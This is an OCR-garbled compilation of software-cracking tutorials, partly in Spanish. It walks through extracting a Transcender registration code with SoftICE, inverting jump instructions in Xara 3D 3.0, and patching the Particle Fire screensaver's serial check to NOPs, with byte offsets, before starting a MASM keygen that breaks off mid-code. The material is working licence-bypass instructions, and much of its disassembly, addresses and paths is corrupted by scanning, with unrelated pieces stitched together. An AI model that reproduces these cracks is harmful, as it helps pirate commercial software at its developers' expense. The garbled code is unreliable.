Step 2: Go to the "C:IWINDOWSASYSTEMADrivers" directory and edit a file called 
"Winice.dat" 

You are going to add the following line to this file: 
"EXP=c:AwindowsXYsystemimsvbvm50.dl1l" 

You can add that line right at the beginning of the Winice.dat file, then save 
the newly edited file. 


Step 3: Reboot, this way Softice becomes active. 


Step 4: Install the Transcender program you need (if you havent already) and 
then run the program. 

Click on the "Enable Full Version" button, then click "Yes" on the license 
agreement page. 

In the box the says "Enter System Key to Enable Product" enter any 10 DIGITS 
you wish. DO NOT CLICK THE "ENABLE PRODUCT" button YET!!! 


Step 5: Hold down the CTRL button, and then hit D. This brings up the Softice 
window. 
Type "BPX hmemcpy" and hit enter 


Step 6: Hold down the CTRL button, and then hit D. This brings up the 
Transcender screen again. 

NOW you can click the "ENABLE PRODUCT" button. 

Once you hit that button, Winice will automatically load. 


Step 7: Now that Winice is loaded again, type "BD *" and hit enter. 
Then press F12 SEVEN times. 

Then type "G OfO0O0D9EC" and hit enter. 

Then press F10 TWO times. 


Then type "D edi" 


Step 8: Congrats, in front of you you have YOUR registration code for 
Transcender. 

The code is in the bottom section of the Winice display window. Look on the 
right side and you will see something LIKE this: 


These numbers are your registration code (remove the periods of course) 
The registration code is 10 numbers AT MOST, but some are 9 numbers. 


Step 9: Write down the registration code you JUST GOT! (in this case it is 
4903751351) 
Type "BC *" and hit enter 


Step 10: Hold down the CTRL button, and then hit D. This brings up the 
Transcender screen again. 

Click "ok" in the window where it says "Please enter a valid system key" 
Replace the registration code you made up with the one you Just wrote down. 
Click "Enable product" 

Wala, easy huh! 

To do other transcender exams just repeat the ENTIRE process above! 


"There is no intelligence where there is no change and no need of change. 
Only those animals partake of intelligence that have to meet a huge variety 
needs and dangers." - H G Wells 


of 


CRACKING XARA 3D 3.0 


Bueno abrimos Xara 3d 3.0 y vamos a registrar o algo haci, ponemos un numero 
cuaquiera como 31337 y vemos como nos salta el error. YOU ENTERED A INVALID 
UNLOCK CODE. THE PROGRAMA HAS NOT BEEN UNLOCKED 

Memorizamos esa frase y la buscamos en el W32Dasm 

Aparecemos aca: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:0040FA34(C), :0040FA48(C), :0040FA64(C), :0040FAB80(C), :0040FA9C(C) 
|:0040FAB8(C), :0040FAD4(C), :0040FAFO(C), :0040FB5D(C) 

| 


* Possible Reference to Dialog: DialogID_0133, CONTROL_ID:00FF, "" 


| 
:0040FC16 6AFF push FFFEFFFF 
:0040FC18 6A10 push 00000010 


* Possible Reference to String Resource ID=03005: "You entered an invalid unlock 
code. 
The program has not been" 


| 
:0040FC1A 68BDOB0000 push OOO0OOBBD <----ACA APERECEMOS 
:0040FC1F ESO3EA0700 call 0048E627 


y ahora lo que nos queda hacer es invertir todos los saltos que llaman a esta funcion. 


Estos son: 

* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:0040FA34(C), :0040FA48(C), :0040FA64(C), :0040FAB80(C), :0040FA9C(C) 
|:0040FAB8(C), :0040FAD4(C), :0040FAFO(C), :0040FB5D(C) 


Vamos a Go To Code Location y ponemos de a una las 


0040FA34(C), :0040FA48(C), :0040FA64(C), :0040FASO(C), :0040FA9C(C) 
0040FAB8(C), :0040FAD4(C), :0040FAFO(C), :0040FB5D(C) 


Anotamos el OFFSET, lo ponemos en el Hex Editor preferido y cambiamos si es un Je 
por un JNE y si es un JNE por un Je 

Todos estos saltos estan a no mas de 5 lineas uno a bajo del otro asi que no te tenes 
que tomar el trabajo de ponerlos todos en Go to Code location. 


Los saltos son estos: 


:0040FA34 0F85DC010000 jne 0040FC16 € ESTE 

:0040FAB3A OFBE10 movsx edx, byte ptr [eax] 

:0040FA3D 52 push edx 

:0040FA3E E89D7E0500 call 004678E0 

:0040FA43 83C404 add esp, 00000004 

:0040FA46 85C0 test eax, eax 

:0040FA48 0F84C8010000 je 0040FC16 € ESTE POR 0F85 
:0040FA4E 8B842440010000 mov eax, dword ptr [esp+00000140] 


:0040FA55 OFBE4801 movsx ecx, byte ptr [eax+01] 


:0040FA59 51 push ecx 


:0040FA5A E8817E0500 call 004678E0 

:0040FA5F 83C404 add esp, 00000004 

:0040FA62 85C0 test eax, eax 

:0040FA64 0F84AC010000 je 0040FC16 € ESTE POR 0F85 
:0040FAGA 8B942440010000 mov edx, dword ptr [esp+00000140] 
:0040FA71 0OFBE4202 movsx eax, byte ptr [edx+02] 
:0040FA75 50 push eax 

:0040FA76 E8657E0500 call 004678E0 

:0040FA7B 83C404 add esp, 00000004 

:0040FA7E 85C0 test eax, eax 

:0040FA80 0F8490010000 je 0040FC16 € ESTE POR 0F85 
:0040FA86 8B8C2440010000 mov ecx, dword ptr [esp+-00000140] 
:0040FA8D OFBE5103 movsx edx, byte ptr [ecx+03] 
:0040FA91 52 push edx 

:0040FA92 E8497E0500 call 004678E0 

:0040FA97 83C404 add esp, 00000004 

:0040FA9A 85C0 test eax, eax 

:0040FA9C 0F8474010000 je 0040FC16 € ESTE POR 0F85 
:0040FAA2 8B842440010000 mov eax, dword ptr [esp+00000140] 
:0040FAA9 0FBE4804 movsx ecx, byte ptr [eax+04] 
:0040FAAD 51 push ecx 

:0040FAAE E82D7E0500 call 004678E0 

:0040FAB3 83C404 add esp, 00000004 

:0040FAB6 85C0 test eax, eax 

:0040FAB8 0F8458010000 je 0040FC16 € ESTE POR 0F85 
:0040FABE 8B942440010000 mov edx, dword ptr [esp+00000140] 
:0040FAC5 OFBE4205 movsx eax, byte ptr [edx+05] 
:0040FAC9 50 push eax 

:0040FACA E8117E0500 call 004678E0 

:0040FACF 83C404 add esp, 00000004 

:0040FAD2 85C0 test eax, eax 

:0040FAD4 0F843C010000 je 0040FC16 € ESTE POR 0F85 
:0040FADA 8B8C2440010000 mov ecx, dword ptr [esp+00000140] 
:0040FAE1 OFBE5106 movsx edx, byte ptr [ecx+06] 
:0040FAE5 52 push edx 

:0040FAE6 E8F57D0500 call 004678E0 

:0040FAEB 83C404 add esp, 00000004 

:0040FAEE 85C0 test eax, eax 

:0040FAFO 0F8420010000 je 0040FC16 € ESTE POR 0F85 
:0040FAF6 8B842440010000 mov eax, dword ptr [esp+00000140] 
:0040FAFD 0FBE4804 movsx ecx, byte ptr [eax+04] 
:0040FBO1 OFBE5006 movsx edx, byte ptr [eax+06] 
:0040FB05 8DOC49 lea ecx, dword ptr [ecx+2*ecx] 
:0040FB08 8DOCCA lea ecx, dword ptr [edx+8*ecx] 
:0040FBOB OFBE5002 movsx edx, byte ptr [eax+02] 
:0040FBOF 8DO0C49 lea ecx, dword ptr [ecx+2*ecx] 
:0040FB12 8DOCCA lea ecx, dword ptr [edx+8*ecx] 
:0040FB15 OFBE5005 movsx edx, byte ptr [eax+05] 
:0040FB19 8DO0C49 lea ecx, dword ptr [ecx+2*ecx] 
:0040FB1C 8DOCCA lea ecx, dword ptr [edx+8*ecx] 
:0040FB1F OFBE10O movsx edx, byte ptr [eax] 


:0040FB22 8D0C49 lea ecx, dword ptr [ecx+2*ecx] 


:0040FB25 8DOCCA lea ecx, dword ptr [edx+8*ecx] 


:0040FB28 OFBE5001 movsx edx, byte ptr [eax+01] 
:0040FB2C 8DOC49 lea ecx, dword ptr [ecx+2*ecx] 
:0040FB2F 8DOCCA lea ecx, dword ptr [edx+8*ecx] 
:0040FB32 OFBE5003 movsx edx, byte ptr [eax+03] 
:0040FB36 8DO0C49 lea ecx, dword ptr [ecx+2*ecx] 
:0040FB39 8D84CA67216BFB lea eax, dword ptr [edx+8*ecx-0494DE99] 
:0040FB40 8BD5 mov edx, ebp 

:0040FB42 8BCD mov ecx, ebp 

:0040FB44 D1EA shr edx, 1 

:0040FB46 81E155555555 and ecx, 55555555 
:0040FB4C 81E255555555 and edx, 55555555 
:0040FB52 8DOC4A lea ecx, dword ptr [edx+2*ecx] 
:0040FB55 69C951ED8764 imul ecx, 6487ED51 
:0040FB5B 3BC1 cmp eax, ecx 


:0040FB5D 0F85B3000000 jne 0040FC16 <€ ESTE POR 0F84 


| Programa Particle Fire screensaver v1.la W9S5 / W98 / NT 

epi Spas 

MA AA e A 
Url [ntup://w ww Jongbowdigitalarts. compa 


Introducción 


El salvapantallas es vistoso, aunque es el primero que veo que pretenden hacerte pagar por él 
(hay gratis a patadas en internet), aunque bueno, cada cual que haga lo que quiera; si realmente te 
gusta, creo que solo son unos 10$... Para registrarse, hay que introducir un número en la pantalla 
de configuración del salvapantallas; si no, al cabo de 7 días, cuando el salvapantallas lleva un par 
de minutos, comienza con los clásicos mensajitos tipo "regístrate porfa". Nunca he visto un 
tutorial sobre un screensaver, así que ya que lo conseguí con este, he pensado en contarlo y de 
paso ilustrar la aplicación del método 'bpx RegQueryValueExaA' para programas que 
interactuan poco o nada con el usuario a la hora de registrarse pero que leen datos tipo s/n desde 
el registro de Windows (este es su punto de contacto con el mundo 'real'). Dado que me 
considero un principiante, he tratado de escribir esto a un nivel bastante bajo, aunque he 
desarrollado dos métodos de cracking, uno para principiantes (parchear) y uno para amateurs 
(keygen); es por estos motivos que este documento es un poco largo. Sin embargo, la gente más 
avanzada podrá leerlo de corrido (o leer directamente el 'briefing' (resumen) del final de todo). 


Al Atake 


1. Familiarizándonos 
Bien, nuestro primer punto de partida es familiarizarnos con el programa y su mecanismo de 
protección. Éste consiste en la introducción de un número en la ventana de configuración del 
protector de pantalla (podemos acceder desde Panel de control / Propiedades de pantalla / Configurar 
protector pantalla, o bien desde el menú contextual que aparece al pulsar el botón derecho sobre el 
fichero de ParticleFire). Si el número no es el correcto, y ya han pasado 7 días desde que lo 
instalamos, veremos mensajes molestos al cabo de un par de minutos de iniciarse el screen saver 
(adelantad 10 días el calendario para verlos). 


Así que tenemos que solucionar eso... pero para nuestra desdicha, constatamos que, tras introducir un 
número (por ejemplo 12345) y aceptar, no aparece ningún mensaje que valide o invalide el código 
introducido. Sin embargo, si volvemos a entrar, nuestro número sigue ahí. Si hacemos algún 
experimento, probando números y entrando y saliendo de la configuración, llegaremos a la 
conclusión de que, posiblemente, el serial num debe ser de 10 cifras (o menos) y formado 
exclusivamente por números (de otro modo, trunca o pone a cero la expresión introducida cuando 
volvemos a entrar a "configurar”). 


Ahora que creemos tener una leve orientación sobre lo que buscamos, hacemos pruebas a base de 
poner break-points en las típicas funciones que capturan el texto de un cuadro de diálogo, 
comparación de cadenas, etc. Pero... no parecen llevarnos a ninguna parte. 


Quizás los autores del Particle Fire quieran echarnos una mano ;) echamos un vistazo al read-me que 
lo acompaña. Allí encontramos un par de informaciones interesantes: 


(1) 'asegúrate de introducir correctamente el serial-num' 
(2) 'por favor no digas a nadie tu número de registro' 


Traducción: 


(1) no hay mensaje tipo 'gracias por registrarte' o 'serial num incorrecto' 
(2) el número es independiente de tu nombre, disco duro, etc.. 


Si bien el punto (2) nos facilita un poco las cosas, el (1) las complica porque significa que, 
posiblemente, la comprobación del serial num no se realiza cuando lo entramos en 'configurar' si no 
al correr el salvapantallas. Es decir, la típica relación causa-efecto entre el serial/keyfile/etc y nag 
screen/reminder/lo que sea, está en cierto modo disociada, separada, retardada. 


Sin embargo, tiene que haber un nexo de unión entre ambos. El número que entramos en configurar, 
el Pfire lo tiene que leer de algún sitio. Yo ya me imagino donde está, pero vamos a correr el Regmon 
para asegurarnos... ejecutamos el salvapantallas y nos encontramos con que, antes de comenzar, lee 
una serie de parámetros del registro. Entre ellos, el serial num... si hacemos doble click sobre esa 
línea desde RegMon, se abrirá el RegEdit en esa rama, y veremos que el Pfire, como buen 
screensaver, tiene guardaditos ahí sus parámetros, incluido el serial num que le hayamos puesto... 
estos parámetros los debe de leer el Particle Fire cuando se ejecuta como salvapantallas... que bien... 
porque hace poco estuve leyendo algo sobre la función API RegQueryValue, que precisamente es 
la que lee datos del registro. Pero en realidad hay varias parecidas; RegQueryValue, 
RegQueryValueEx y RegQueryValueA. Para Win32 ansi la 'ExA' es la que nos vale, pero por 
si tenemos duda en estos casos, abrimos el fichero en el w32 Dasm, y le damos al botón de funciones 
importadas; allí nos aparecerá, para este caso, la función RegQueryValueExA, junto a otras funciones 
tipo OpenKey que van "abriendo" el camino para la QueryValue. Creo que el serial num se debe 
sentir un poco solo, así que vamos a tratar de acompañarle durante su viaje, a ver que hacen con él. 
Antes de empezar, escogemos un serial que nos haga de referencia, para identificarlo luego cuando lo 
lea y lo compare o haga lo que sea con él. Basándonos en nuestras pruebas, ponemos 1000000000 
(mil millones) en la pantalla de configurar (podemos poner otro, pero recordemos cual), aceptamos y 


salimos. Tomamos tambien nota del equivalente en hexadecimal de nuestro número, para que no nos 
cojan desprevenidos; 3B9ACA0O. Ahora pondremos el breakpoint y trataremos de subirnos al tren a 
la vez que lo hace nuestro serial. 


2. Manos a la obra: un breakpoint en la lectura del registro 

Para ello, ctrl+d, bpx RegQueryValueExa, ctrl+d. Traducción: entramos al Softlce, ponemos un 
breakpoint en la función de Windows que lee del registro para que el Softlce nos avise y salimos otra 
vez a Windows con ctrl+d. Ahora tenemos dos opciones, ejecutar nosotros mismos el salvapantallas o 
esperar que salga (previamente le habremos puesto el mínimo tiempo, un minuto). Esto puede parecer 

una tontería, pero si lo ejecutamos directamente, aparecerán unas 50 llamadas-basura a la función 

RegQueryValueExA (por lo menos a mi me pasa). Si esperamos que salga el Pfire por si solo, ya 
casi estaremos en el punto (nota: puede que durante la espera nos salte el breakpoint hasta 10 veces o 

más -o quizás ninguna-, por accesos rutinarios del sistema al registro; lo ignoramos haciendo ctrl+d 
para salir otra vez, y seguimos esperando hasta que pase el minuto y nos salga el pfire; para disminuir 

el riesgo de que pase esto, mejor no tener programas abiertos o solo lo imprescindible, y 
evidentemente, no tocar ninguna tecla ni mover el ratón). 


Al cabo de un minuto, nos sale un breakpoint. Este ya es del propio Pfire, ya que en el borde inferior 
derecho del Softlce pondrá 'Particle Fire". No obstante, las primeras llamadas aún no nos 
interesan. Si hacemos F12, veremos que se ha llamado a la función a través de un CALL ESIo 
CALL EBX. Mientras esto suceda (seguramente saldrán 4 llamadas de este tipo en total, dos de cada), 
vamos haciendo ctrl+d, hasta que llegue un momento en que al salir el breakpoint y apretar F12 
veamos que se ha llamado a la función por su nombre, algo así como: 


PUSH ECX 


PUSH ESI 

PUSH ESI 

PUSH 004147F8 

PUSH DWORD PTR [EBP-04] 

CALL [ADVAPI32!RegQueryValueExA] 
TEST EAX, EAX 


(insisto, ten en cuenta que no 'aterrizas' directamente aquí, tienes que haber pulsado F12) 


Vamos a comentar la jugada: en azul, los PUSH van pasando uno a uno los parámetros de la función, 
a la cual se llama con el CALL, en rojo. Concretamente, el penultimo valor contiene la dirección de 
memoria donde se halla el nombre del valor que se quiere leer (esto lo sabemos si miramos la 
documentación de referencia de WinAP132). En este caso, vemos que es 4147F'8, así que hacemos 
und 4147F8 para que el Softice nos muestre que hay en esa dirección. Veremos en la pantalla de 
datos (si no la tienes a la vista, se pone/quita con wd) que es 'screensaveusepassword'. Bueno, esto no 
nos interesa, solo debe estar comprobando si tenemos puesto password con el salvapantallas o no. Así 
que ctrl+d, y de nuevo ha saltado el breakpoint por otro acceso al registro. Pulsamos F12 para ver 
quien le ha llamado y como, y tenemos: 


015F:00404F7A PUSH EAX 

015F:00404F7B PUSH ECX 

015F:00404F7C MOV EAX, [ESI+00000400] 
015F:00404F82 PUSH EDX 

015F:00404F83 PUSH 00 

015F:00404F85 PUSH EBX 

015F:00404F86 PUSH EAX 

015F:00404F87 CALL [ADVAPI32 ! RegQueryvalueExA] 


015F:00404F8D TEST EAX, EAX 


015F:00404F8F JNZ 00404FA7 
015F:00404F91 MOV EAX, (ESP+14] 
015F:00404F95 MOV ECX,ESI 
015F:00404F97 MOV [EDI], ,EAX 


Reconocemos la idea otra vez, ¿no? En azul, son los parámetros que pasamos, en rojo la llamada a la 
función. Como veríamos si siguieramos saliendo y entrando, este fragmento del código es el que a 
partir de ahora se repetirá en cada lectura de valores del registro (claro que cada vez se lo montará 
para usar parámetros distintos, si no siempre haría lo mismo, pero será el mismo trozo de programa), 
de modo que vamos a borrar nuestro breakpoint con bc 00, y a poner otro justo en el punto donde 
llama a la función, para que antes de llamarla podamos ver qué pretende hacer; así que ponemos bpx 
404187 (fíjate cual es esta dirección en tu caso; podría ser otra). Este cambio de breakpoint no es 
100% imprescindible, pero así nos ahorraremos darle al F12 cada vez y todo será más claro, puesto 
que pararemos ANTES de entrar en la función RegQueryValueExa. Por cierto, antes de salir 
hacemos d ebx y vemos : RandomTime, uno de los parámetros. Bueno, aún no es el que nos 
interesa, pero parece que estamos en el buen camino... 


Así que ctrl+d para salir, y boom, ya estamos otra vez en Softlce, justo antes de llamar otra vez a 
RegQueryValueExA (no hemos de pulsar F12). Vamos a ver que quiere leer ahora... hacemos a 
ebx, y nos sale GravityTime... otro parámetro, y justo despues suyo pone RandomTime...mmh, 
es el anterior... usamos alt+flecha arriba/abajo para desplazarnos por ese listado, y vemos como 
encima de esos parámetros, están los demás haciendo 'cola', concretamente deberíamos estar viendo 
RandomColor, ColorScheme, Particles y ... nuestro querido SerialNum! Pues bueno, 
como es evidente se trata de ir haciendo ctrl+d y comprobando ebx (todo el rato el listado será como 
el que he puesto más arriba) hasta que estemos en el punto en que va a leer el serial num. Son 4 
veces, pero es recomendable ir uno a uno y comprobando ebx hasta que veamos que apunta 
directamente a SerialNum. Ahora querremos ver que hace con él, así que vamos a ir trazando la 
función. Estamos situados en el CALL [ADVAP132 ! RegQueryvalueExA]; pulsamos F10 
puesto que no nos interesa seguir a la función API en sí (tanto FS como F10 ejecutan igual el 
programa, pero con F10 nos ahorramos ver la ejecución de CALLs como este que no nos interesan). 
Ahora representa que hemos vuelto de la función que lee el registro, y el valor de nuestro serial num 
de prueba debe andar en alguna parte. Observemos las lineas siguientes al CALL: 


015F:00404F87 CALL [ADVAPI32 ! RegQueryvalueExA] 
015F:00404F8D TEST EAX,EAX 

015F:00404F8F JNZ 00404FA7 

015F:00404F91 MOV EAX, [ESP+14] 

015F:00404F95 MOV ECX,ESI 

015F:00404F97 MOV [EDI],EAX 

0 


15F:00404F99 CALL 00404EC0 


Eltest eax,eax y el jnz parecen una comprobación de rutina a la vuelta de la función. Los 
movimientos que hay despues parece que sean mas deliberados. Echamos un vistazo a esos valores, 
teniendo en cuenta que nuestro serial 1000000000 en hexadecimal es 3B9ACA0O. Haciendo d 
esp+14, enseguida encontramos que en esa dirección está nuestro querido serial, que es copiado a 
EAX (nota: si veis el serial 'al revés' o sea OOCA9A3B, pulsad SHIFT+F3 para cambiar el formato de 
la ventana data hasta verlo como DWORD - gracias PicsOne!). Pero no le perdamos la pista, porque 
dos lineas más abajo vuelve a cambiar de vagón: ahora EAX se copia a la dirección apuntada por 
EDI. Bueno, pues miramos el valor de EDI con ? edi, y en mi caso es 412114. Ahí se sienta mi 
serial, así que vamos a poner un breakpoint para que cualquier acceso a esa posición de memoria sea 
detectada; ponemos bem 412114 (ojo, no bex si no bpn : no controla la ejecución si no la 
manipulación de lo que hay en ella). Tambien quitamos el bex 404f87 que teníamos, puesto que 
ya nos ha aportado lo que queríamos; bc 00, ctrl+d y salimos del Softice. 


3. La rutina de comprobación del serial 


Y en una fracción de segundo ya hemos vuelto al Softice. Alguien está metiendo mano a nuestro 
serial. Vemos lo siguiente: 


015F': 
015F': 
015F': 
015F': 
015F': 
015F': 


00402726 
0040272B 
00402720 
00402731 
00402734 
00402736 


MOV 
PUSH 
CALL 
ADD 
TEST 
JNZ 


EAX, 
EAX 
00401000 
ESP, 04 
EAX, EAX 
00402A69 


[o0412114] 


En pocas palabras, carga nuestro serial en EAX, lo envía a la pila con un PUSH y llama a algún tipo 
de rutina en la 401000... ¿quizás la que comprueba si es correcto? Vamos a seguir la rutina; vamos 
pulsando FS (ahora si que nos interesa ver qué hace el CALL) hasta que al ejecutar el CALL, 
llegamos a una rutina que es ya la pieza clave de todo el asunto; veámosla parte a parte: 


015F': 
01:5F 


015F 


00401000 


00401004 


:00401005 
015F': 
015F': 
015F': 


0040100A 
0040100€ 
00401011 


MOV 
PUSH 
CMP 
JBE 
CMP 
JAE 


EAX, 
ESI 
EAX, 3B9ACA00 
00401049 
EAX, 77359400 
00401049 


[ESP+04] 


r 
r 
r 


7 


compara con 1000000000 
si menor o igual, fracaso 
compara con 2000000000 
si mayor o igual, fracaso 


Esta primera parte en azul hace lo siguiente: recupera en EAX el valor de la pila (ESP+04), que como 
sabemos es nuestro serial, y a continuación comprueba que sea mayor que 3B9ACA0O (mil millones 
en decimal) y menor que 77359400 (dos mil millones en decimal). Si no es así, salta a la 401049, 
la cual huele a fracaso porque es más fácil ir a parar a ella que evitarla. No ibamos tan mal 
encaminados, ahora sabemos el rango concreto en el que se situa el serial. Claro que hay mil millones 
de números en ese intervalo, y si tenemos planes para el resto de nuestra vida, no vamos a poder 
probarlos todos. Veremos que más comprueba si el número cumple el requisito anterior. El código 
que viene ahora lo podemos ver, aunque al ir trazando con ES no lo ejecutará (saltará a la 401049 tras 
la primera comparación) ya que nuestro serial no es MAYOR que mil millones. Si quisieramos trazar 
esta parte del código para ir mirando como cambian los registros, etc, podemos hacer una pirula; 
situarnos con el ratón en EAX y cambiar su contenido de 3B9ACA0O (nuestro serial) a 3B9ACAO1, 
por ejemplo. Sea como sea, veamos lo que viene ahora, resaltado en rojo: 


H 
[61] 
E 


Rt H 
a au [61] 
2 Ej 


H 
61) 
dl 


00-10: 0:.0O-0:-0 0: 0.0 0-0 0 0: 0-0 O 0:0 


L5SES 
15F': 
:00401017 
15F': 
15F': 
15F': 
15F': 
:00401028 
15F': 
15F': 
15F': 
:00401030 
:00401033 
15F': 
USES 
15F': 
:0040103ÉE 
15F': 
15F': 


00401013 
00401015 


0040101A 
00401010 
0040101=F 
00401025 


0040102A 
00401020 
0040102E 


00401035 
0040103A 
0040103C 


00401040 
00401042 


ECX, EAX 
ESI,EAX 

ECX, 14 

EDX, EAX 
ESI,10 
ECX,FFF00000 
EDX, 10 
ESI,EDX 

EDX, EDX 
ESI,ECX 

ECX, EAX 

ECX, 0€ 
ESI,ECX 
ECX00002694 
EAX, ESI 

ECX 

EDX, EDX 
00401049 
EAX, 00000001 


015F:00401047 POP ESI 
015F:00401048 RET 

015F:00401049 XOR EAX, EAX 
015F:0040104B POP ESI 
015F:0040104C RET 


En pocas palabras: el tramo resaltado en rojo hace unas operaciones con nuestro número; el tramo 
siguiente, en blanco, determina si el número ha "pasado la prueba", y de no ser así, nos envía a la 
401049... sí, la que olía a fracaso, aquí de color gris, que es la vía de salida de los perdedores... Pero 
por suerte nosotros no somos de esos. Nos interesa recorrer todo el tramo blanco, donde vemos que 
basicamente vuelve copiando un 1 en EAX, que a mi me huele que es una especie de flag tipo 'si, 
teniente; el chico está limpio", ya que en caso contrario, lo primero que se hace en la 401049 es 
poner eax a cero con el xor eax, eax así que veamos por donde atacar... 


Lo primero que deberíamos pensar, una vez suponemos que este es el punto clave, es que todo ese lío 
en color rojo no merece que nos rompamos la cabeza; lo más fácil es parchear algo, tipicamente las 
comparaciones y/o los saltos. Es un principio del cracking elegir la vía más fácil y no calentarse la 
cabeza gratuitamente. Aunque por otra parte, también se dice que hay que ser lo más elegante 
posible, entendiendo esto como practicar la mínima intrusión al modificar el código del programa. Y 
desde luego si queremos aprender algo, habrá que hacer caso de lo que dicen los que saben del tema. 
Claro que tambien nos advierten de que en la práctica se dan casos como este, donde nos 
encontramos en una disyuntiva; lo más fácil es parchear, pero lo más elegante es generar un serial 
bueno sin tocar el programa original. En este caso, decidí que buscaría un serial correcto más por 
aprender algo que por otra cosa, pero en este tutorial desarrollaré ambas posibilidades; la de parchear 
es más apropiada para principiante, y la de analizar el código en rojo y encontrar un serial para 
amateur (requiere un poquito más de esfuerzo). Comencemos por el parcheo. 


4. Opción fácil : parchear 


Como sabeis, parchear consiste en sustituir unas intrucciones por otras; típicamente se cambian saltos 
y comparaciones por 'nops' (NOPs = no operation, o sea no hacer nada). También, en casos como 
este, podíamos haber considerado pasar de todo y 'borrar' los mensajes shareware parcheando con 
'00', pero por varios motivos no me parece una vía con futuro. El caso es que siempre hay varias 
Opciones, pero en nuestro caso creo que la más simple sería parchear los 3 saltos a la 401049 con 
nops, de modo que si el número es menor que un millardo o mayor que dos, o si no cumple la 
condición que luego se aplica, en vez de saltar a la 401049, no hace nada y sigue. Con lo cual el 
código correrá sin alteraciones en su flujo hasta el final del tramo blanco. Así que ponemos code on, 
y vemos el valor de los bytes que equivalen a esas instrucciones en el fichero; la primera 
comparación es 3d00ca 9a3b, el primer salto jbe es 763 6, la segunda comparación es 
3400943577, el segundo salto jae es 733 6, y el último es 7507 (en realidad solo nos interesa el 
código de los saltos, pero tomamos nota de los que van antes y despues para luego asegurarnos que 
hemos encontrado el correcto). Ponemos el editor hexa, en mi caso el hiew, cargamos el fichero, 
pulsamos F4 y elegimos hex, y pulsamos F7 para buscar. Con la tecla tab saltamos al campo 'HEX' y 
tecleamos 3d00ca9%a3b763d3d00943577 (o solo 763d pero luego a ojo miramos que lo de 
antes y despues es lo que esperábamos, si no seguimos buscando). Así nos aseguramos de estar en el 
punto correcto comprobando que los códigos anteriores y posteriores coinciden con los que anotamos 
antes. El hiew nos situará al principio de la localización de la cadena de bytes hallada. Como todo 
está en la misma zona, localizando el 763d ya vemos a ojo los demás un poco más abajo. Pulsamos 
F3 para editar, y situándonos en los lugares correctos, cambiamos 763d,7336 y 7507 por 9090, 
9090 y 9090 (si metemos la pata, con esc deshacemos los cambios y luego empezamos de nuevo). 
Si esta Ok, pulsamos F9 para grabar los cambios en el fichero. Para hacerlo aún más fácil, ahí va una 
lista de los offset locales, el valor original de cada byte y el valor parcheado: 


File 1: File 2: 
Offset: ORIGINAL PARCHEADO 


40Ah 76h 90h 


40Bh 3Dh 90h 
411h 73h 90h 
412h 36h 90h 
440h 75h 90h 
441h 07h 90h 


Number of differences: 6 


(en el hiew, para cambiar entre vista de offset local y offset global, pulsa alt+£1) 


En fin, si despues de esto aún te quedan ganas, puedes buscar un crackmaker y crear tu propio crack a 
partir del fichero original (del que habrás guardado una copia) y el que acabamos de parchear. 


5. Opción no tan fácil: análisis de la rutina de chequeo del serial 
Aunque a mi que no tengo ni idea del tema me dió un poco de dolor de cabeza, solo es cuestión de 
unos minutos y paciencia descifrar el mecanismo que sigue el código que más arriba resalté en rojo. 
Si nuestro número es "**", el programa realiza la siguiente comprobación: 


XOR [ [f XOR (OR a,b , AND c,a) , e ] 


donde, si "+" es igual al serial introducido: 


= 


a = shl (4,10) 
b = shr (4,10) 
c= shl (+,14) 
d = ff££00000 

e = shr ($,0c) 


Una vez calculado el churro en cuestión, llamémosle "F" al resultado, realiza otro xor: 


XOR (+,F) 


, y sobre este resultado, efectua una división (DIV) por 2694h (la 'k' quiere decir que está en 
hexadecimal, como sabreis). Si la división tiene resto (módulo), fracaso (también conocido como 
billete de ida a la 401049). Por ejemplo, para 3B9ACAO01 (1000000001 en decimal), el resto es 
26£,o0 lo que es lo mismo, distinto de cero, o lo que es lo mismo, de cabeza a la 401049, o lo que 
es lo mismo, fracaso, chico malo, etc. 


El caso es que integrándolo todo, podemos formularlo como una ecuación. Pero ignoro si es posible 
solucionarla de modo analítico (reordenando, simplificando, despejando...), ya que para una cosa que 
si que sé un poco (matemáticas), me encuentro con un tipo de funciones (and, or, xor...) alas 
que no estoy acostumbrado. Caso de poderse solucionar, como que ha de tener muchas soluciones (no 
va a haber un único serial), nos quedaría en función de un valor que daríamos nosotros, en plan 
f(x)=y. Pero como digo, yo no sé solucionarlo así. De modo que la alternativa son los métodos 
numéricos (o sea, probando hasta que hallemos un número correcto - con la potencia de cálculo de un 
ordenador, sería cuestión de fracciones de segundo). Yo pretendía probarlo con el solver del Excel 
(da valores hasta encontrar una solución) pero... no puedo utilizar esas funciones porque no están 
disponibles en el Excel (alguna lo está, pero que yo sepa solo con resultados booleanos tipo 
verdadero/falso, no resultados numéricos). De modo que ya que en assembler existen están funciones, 
quizás pudiéramos programar algo... si, hombre, que nadie se asuste, yo no sé casi nada de assembler 
pero mira ahí arriba... el 90 % de nuestro keygen ya está hecho. Simplemente hemos de cambiar que, 
si el número no da resto cero tras la transformación, en vez de "echarnos", aumente una unidad al 


número inicial y pruebe de nuevo. Yo, la primera vez, hice algo muy simple; una rutina que comienza 
por 1000000000, y a partir de ahí, hace un cálculo; le suma una, le hace todo el churro de más 
arriba, y si no da el resto cero, vuelve a sumarle uno, hacer todo el churro... hasta que salga uno 
bueno. Como no sabía cómo mostrar ese número, se me ocurrió poner un messageboxa una vez 
sale del cálculo, antes de terminar el programa, para poder poner un bpx y ver que número había 
salido (hice que cada vez la rutina guardase una copia del número que prueba en EDI, porque el 
original en EAX queda 'desfigurado' por la comprobación). Así que una vez ensamblado, pongo un 
bpx messageboxa, y cuando me sale, le doy a F12 para volver a mi programa principal, y escribo 
? edi ,obteniendo 1000002675 en decimal, esto es, ¡el serial del cliente número uno! (que 
honor, seguro que lo reservaban para alguien importante). El programa lo ensamblé con el mASM32; 
como digo no sé assembler más que 4 cosas, por lo cual no puedo entrar en mucha explicación sobre 
parámetros de ensamblado, etc, simplemente creé el ejecutable. Si no me equivoco, era así: 


.386 

.model flat, stdcall 

option casemap:none 

include c:imasm32Xincludewindows.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm321Mliblkernel32.1lib 
include c:imasm32lincludeluser32.inc 
includelib c:imasm321libluser32.lib 

¿ Cosas generales para ensamblar y linkar 


. data 

MsgBoxCaption db "SuperCutre's Key-Gen",0 

MsgBoxText db "Bpx en el NOP y el resultado en EDI",0 
Serial_Start dd 3b%aca00h 

¡; reservamos e inicializamos unas variables del msgbox 
¿ y el número de inicio (1000000000) 


. code 

start: ¿ vamos a por ello 

Calculo: 

